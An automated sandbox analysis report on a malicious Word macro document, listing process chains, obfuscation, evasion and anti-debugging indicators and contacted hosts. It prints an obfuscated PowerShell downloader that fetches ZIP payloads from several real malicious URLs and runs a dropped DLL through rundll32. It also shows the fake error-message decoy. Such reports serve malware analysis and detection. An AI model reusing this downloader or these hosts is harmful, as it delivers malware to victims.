Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0090F9A0 7_2_0090F9A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091FDD0 7_2_0091FDD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009289F0 7_2_009289F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009271F0 7_2_009271F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00905150 7_2_00905150
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00901570 7_2_00901570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00917564 7_2_00917564
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091AE80 7_2_0091AE80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00918AB0 7_2_00918AB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921EB0 7_2_00921EB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009226B0 7_2_009226B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00906AD0 7_2_00906AD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009196D0 7_2_009196D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00923EC0 7_2_00923EC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092FA10 7_2_0092FA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091B6F0 7_2_0091B6F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00918EF0 7_2_00918EF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009262F0 7_2_009262F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091F6E0 7_2_0091F6E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0090CA10 7_2_0090CA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092FA10 7_2_0092FA10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00920220 7_2_00920220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0092D620 7_2_0092D620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921240 7_2_00921240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00909E70 7_2_00909E70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00919E70 7_2_00919E70
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091A660 7_2_0091A660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00927660 7_2_00927660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00922E60 7_2_00922E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009183C0 7_2_009183C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00917FC0 7_2_00917FC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00927FC0 7_2_00927FC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_009167C8 7_2_009167C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091E3F0 7_2_0091E3F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00929B10 7_2_00929B10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00923B00 7_2_00923B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00921730 7_2_00921730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0091BF50 7_2_0091BF50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00915B60 7_2_00915B60
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Order.802796810.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Hcpsclo3w5h, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Order.802796810.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2102848578.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097661823.0000000002100000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@10/7@1/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$der.802796810.doc Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC35E.tmp Jump to behavior
Source: Order.802796810.doc OLE indicator, Word Document stream: true
Source: Order.802796810.doc OLE document summary: title field not present or empty
Source: Order.802796810.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............`........................... .R.......R.....................................#...............................h.......5kU............. Jump to behavior
Source: C:\Windows\System32\msg.exe Console Write: ............`...................A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......(.......L....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v....@.......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N...............m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......m...............#.............}..v....0.......0.N.............H.m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j......................#.............}..v............0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j..... #...............#.............}..v....p.......0.N...............m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7...............]..j.....Im...............#.............}..v.....I......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....J................#.............}..v.....K......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C...............]..j.....Im...............#.............}..v.....Q......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....R................#.............}..v.....S......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O...............]..j.....Im...............#.............}..v.....Y......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....Z................#.............}..v.....[......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.... _......0.N.............hFm.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.......[..................j....._................#.............}..v....X`......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.5.1.............}..v....hd......0.N.............hFm.....$....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j.... e................#.............}..v.....e......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s...............]..j.....Im...............#.............}..v....hl......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.... m................#.............}..v.....m......0.N..............Gm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................]..j.....Im...............#.............}..v....ht......0.N............................................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc [base64-encoded command removed]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089688133.0000000001D57000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2089799072.0000000001F40000.00000002.00000001.sdmp
Source: Order.802796810.doc Initial sample: OLE summary subject = bandwidth-monitored strategize Investment Account Well Small full-range Product

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Source: Order.802796810.doc Stream path 'Macros/VBA/Ty191wz8hynv3fl' : High number of GOTO operations
Source: VBA code instrumentation OLE, VBA macro, High number of GOTO operations: Module Ty191wz8hynv3fl Name: Ty191wz8hynv3fl
Document contains an embedded VBA with many randomly named variables
Source: Order.802796810.doc Stream path 'Macros/VBA/Ty191wz8hynv3fl' : High entropy of concatenated variable names
Obfuscated command line found
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B50 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc, 7_2_10001B50
PE file contains sections with non-standard names
Source: I11F.dll.5.dr Static PE information: section name: .2
Source: I11F.dll.5.dr Static PE information: section name: .rdata2
Source: I11F.dll.5.dr Static PE information: section name: .text5
Source: I11F.dll.5.dr Static PE information: section name: .text4
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0093A012 push ebp; retf 7_2_0093A015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00938596 push ebx; retf 7_2_009385AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0093B1CC push ebx; retf 7_2_0093B1CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B50 push ecx; ret 7_2_10001BFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F810 pushfd ; retf 7_2_1000F84E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C856 push ebp; retf 7_2_1000C85E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001C70 push edx; ret 7_2_10001CC3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000D8F3 pushad ; iretd 7_2_1000D8F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001BD9B push esp; retf 7_2_1001BDB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B265 push 588A19FDh; iretd 7_2_1000B278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001FA73 push edx; iretd 7_2_1001FA9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EEBF push eax; iretd 7_2_1000EEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000EEFA push 00000000h; iretd 7_2_1000EF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10022EFF push eax; iretd 7_2_10022F64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000B304 push 588A1BCDh; iretd 7_2_1000B314
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F307 push esp; retf 7_2_1000F308
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000BF15 push 0000002Dh; iretd 7_2_1000BF1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001CB23 push eax; iretd 7_2_1001CB34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1001FB27 push eax; iretd 7_2_1001FB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000CFC7 pushad ; iretd 7_2_1000CFC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10022FEB push edx; ret 7_2_10023001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000F7FB pushfd ; retf 7_2_1000F84E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029BFB0 push edx; ret 7_2_0029C269
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00267172 push dword ptr [ebp+ecx*8-49h]; retf 7_2_00267176
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002862CD pushad ; iretd 7_2_002862E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027F6CD push esi; ret 7_2_0027F6D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026899D push 00000369h; ret 7_2_00268A28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002689CD push 00000369h; ret 7_2_00268A28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0028FB74 push esi; ret 7_2_0028FB8B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00261D11 push FFFFFFD5h; ret 7_2_00261D18
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00260E8F push esi; ret 7_2_00260E94

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001CE0 EntryPoint,GetTextCharacterExtra,CreateSolidBrush,IsCharAlphaW,GetOpenClipboardWindow,GetProcessWindowStation,IsWindowUnicode,LoadCursorW,DeleteObject,IsGUIThread,GetFontLanguageInfo,GetSystemPaletteUse,GetWindowTextLengthA,DeleteDC,GetClipboardOwner,DeleteEnhMetaFile,GetMenu,IsCharLowerW,DeleteMetaFile,GetMenuItemCount,ShowCaret,WindowFromDC,CharUpperA,CreateMetaFileW,IsCharAlphaNumericA,GetTextColor,CreateCompatibleDC,GetParent,GetSystemPaletteUse,FlattenPath,EndPath,GdiFlush,DestroyIcon,GdiGetBatchLimit,GetEnhMetaFileW,GetDCBrushColor,CreateMetaFileA,GdiGetBatchLimit,GetDoubleClickTime,GetCapture,GetWindowTextLengthA,ReleaseCapture,GetSystemMetrics,GetKBCodePage,GetEnhMetaFileA,IsMenu,LoadCursorFromFileW,CloseWindowStation,AddFontResourceW,IsMenu,GetShellWindow,GetKeyboardType,IsCharAlphaNumericA,GetSystemMetrics,GetMapMode,SaveDC,GdiFlush,FillPath,CreatePatternBrush,CharUpperW,AbortPath,CreateSolidBrush,GetCaretBlinkTime,AnyPopup,GetMessagePos,GetMessageExtraInfo,GetOpenClipboardWindow,PaintDesktop,CharLowerW,GetDlgCtrlID,GetMenuCheckMarkDimensions,CharLowerW,GetInputState,GetColorSpace,VkKeyScanW,BeginPath,CreateMetaFileA,IsGUIThread,DrawMenuBar,EnumClipboardFormats,GetLayout,ReleaseCapture,CharUpperA,CancelDC,LoadCursorFromFileA,DestroyIcon,DeleteEnhMetaFile,GetClipboardSequenceNumber,WindowFromDC,GetCursor,GetPixelFormat,GetWindowTextLengthW,GetDialogBaseUnits,IsIconic,DestroyWindow,OemKeyScan,GetMapMode,GetInputState,IsCharAlphaNumericA,DestroyMenu,GetDoubleClickTime,GdiFlush,GetKeyboardLayout,IsCharAlphaNumericA,CharUpperA,CharUpperW,GetDCPenColor,DeleteMetaFile,GetClipboardSequenceNumber,SwapBuffers,CreateMetaFileW,IsCharLowerA,GetTextAlign,DestroyMenu,DrawMenuBar,GetFontLanguageInfo,SwapBuffers,IsWindowUnicode,AnyPopup,EndMenu,WidenPath,RealizePalette,GetLastError, 7_2_10001CE0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002788DD rdtsc 7_2_002788DD
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1100 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: powershell.exe, 00000005.00000002.2089530834.0000000000214000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002788DD rdtsc 7_2_002788DD
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B50 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc, 7_2_10001B50
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B5D0 mov eax, dword ptr fs:[00000030h] 7_2_0029B5D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0029B6E0 mov eax, dword ptr fs:[00000030h] 7_2_0029B6E0
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00917A60 RtlAddVectoredExceptionHandler, 7_2_00917A60

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SeT-itEm vaRIaBlE:w2HC ([tyPE]("{0}{2}{3}{1}" -f'sySt','rECtoRy','eM.io.','Di') ) ; sEt-item ("VAria"+"ble:"+"s"+"9n6") ( [type]("{4}{0}{7}{5}{8}{3}{6}{2}{1}"-f 'sTEm.n','ER','nag','ic','Sy','.','EPoiNtma','ET','Serv') ); $Rze8ms1=$L_7F + [char](64) + $Z40J;$U51B=(('I'+'86')+'Y'); $w2hC::"crEat`eDi`RectO`Ry"($HOME + (('Fp'+('fL'+'x8')+('o'+'0s'+'zFp')+('fGzta'+'zk')+('lF'+'p')+'f')-rEplaCE ('F'+'pf'),[ChAr]92));$Q81B=('X'+('4'+'_V')); $S9N6::"sEcur`i`TYpRo`TOcOL" = ('T'+('l'+'s12'));$P55L=(('I'+'_6')+'F');$Olvvwn6 = (('I'+'11')+'F');$I82O=('I'+('34'+'R'));$Uo7olue=$HOME+((('cH'+'q')+('Lx8'+'o'+'0s')+('zcH'+'q')+('Gzt'+'az')+('k'+'lcHq')) -ReplACE ([CHaR]99+[CHaR]72+[CHaR]113),[CHaR]92)+$Olvvwn6+('.d'+'ll');$S_6P=('R'+('51'+'N'));$Gt0es1u=(('A]'+'['+'q[D')+':/'+('/m'+'ai')+('l.'+'k')+'yo'+'j'+'in'+('c'+'ond')+'ui'+'t'+'s.'+('com/j'+'hgu'+'n')+('75'+'3')+('.zip@A]['+'q[D'+'://')+'a'+('ccur'+'at'+'ebc')+('.gr'+'/e0lw'+'3t.z'+'i')+('p@'+'A]')+'[q'+('[D'+':')+('//tu'+'mk')+('uv.o'+'r')+('g.tr/'+'z'+'d8')+'dx'+('b2u'+'.zi'+'p')+'@'+('A'+'][')+'q['+'D:'+'//'+'t'+'he'+('w'+'orldofjac'+'o'+'b.')+'c'+'om'+('/cjs'+'o')+('mlo'+'.zip@')+('A'+'][q')+'['+('D:/'+'/')+'e-'+('maco'+'m')+'.'+('c'+'om.')+('b'+'r/cl3')+'5'+('e0.zip'+'@A'+'][')+'q['+('D'+':/')+'/l'+('eg'+'i'+'on.s'+'er'+'iesn')+'ow'+('.we'+'b')+('sit'+'e')+'/q'+('3'+'3rv')+'2'+('.zi'+'p'))."re`pl`ACE"((('A]'+'[')+'q'+'[D'),([array](('d'+('s'+'ewf')),('w'+('evw'+'e'))),('ae'+'ff'),(('ht'+'t')+'p'))[2])."SPl`it"($K17P +
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll RunDll
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc (base64-encoded command omitted)
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Behavior Graph ID: 339433 Sample: Order.802796810.doc Startdate: 14/01/2021 Architecture: WINDOWS Score: 100
Sample-level signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 11 other signatures
Process chain: WINWORD.EXE and cmd.exe started. cmd.exe (Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found) started powershell.exe and msg.exe. powershell.exe contacted mail.kyojinconduits.com (198.54.126.36, port 80, NAMECHEAP-NETUS, United States), dropped C:\Users\user\Lx8o0sz\Gztazkl\I11F.dll (PE32; Powershell drops PE file) and started rundll32.exe, which in turn started a second rundll32.exe.

Contacted Public IPs

IP Domain Country ASN ASN Name Malicious
198.54.126.36 unknown United States 22612 NAMECHEAP-NETUS true

Contacted Domains

Name IP Active
mail.kyojinconduits.com 198.54.126.36 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://mail.kyojinconduits.com/jhgun753.zip true Avira URL Cloud: malware unknown